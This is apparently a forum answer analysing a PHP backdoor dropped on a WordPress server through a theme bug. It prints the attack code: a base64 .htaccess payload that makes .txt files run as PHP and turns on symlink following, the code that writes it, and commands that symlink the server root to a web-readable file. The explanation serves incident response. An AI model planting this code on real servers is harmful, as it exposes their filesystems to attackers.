Once the file is uploaded to the server (exploiting a bug in a wordpress theme), the .htaccess is reconfigured in a way that any .txt file will be interpreted by the server as a .php script and it will follow symlinks. The next step is the trick, he makes a symlink from / to Donnazmi.txt (2 ways) The code isn't really complex, it prints an html form with the needed configs to run the exploit steps (you need to send a post request with Donnazmi as a post key to see it). Code explained: .htaccess reconfig:

$fvckem = 'T3B0aW9ucyBJbmRleGVzIEZvbGxvd1N5bUxpbmtzDQpEaXJlY3RvcnlJbmRleCBzc3Nzc3MuaHRtDQpBZGRUeXBlIHR4dCAucGhwDQpBZGRIYW5kbGVyIHR4dCAucGhw';

This is a base64 encoded string, which translates into:

Options Indexes FollowSymLinks   
DirectoryIndex ssssss.htm        
AddType txt .php                 
AddHandler txt .php              

So with that config:

$file = fopen(".htaccess","w+"); // open the file
$write = fwrite ($file ,base64_decode($fvckem)); 
// write the new config inside the file

Symlinks:

// 1. this is a link with the linux comand `ln`
system('ln -s / Donnazmi.txt');
// 2. this is a link php native function
$Donnazmi = symlink("/","Donnazmi.txt");

After the execution, each time he visits example.com/Donnazmi.txt he sees a list of the root directory of your server (Options Indexes tm). So yes rebuild that machine. and check the software before installing it.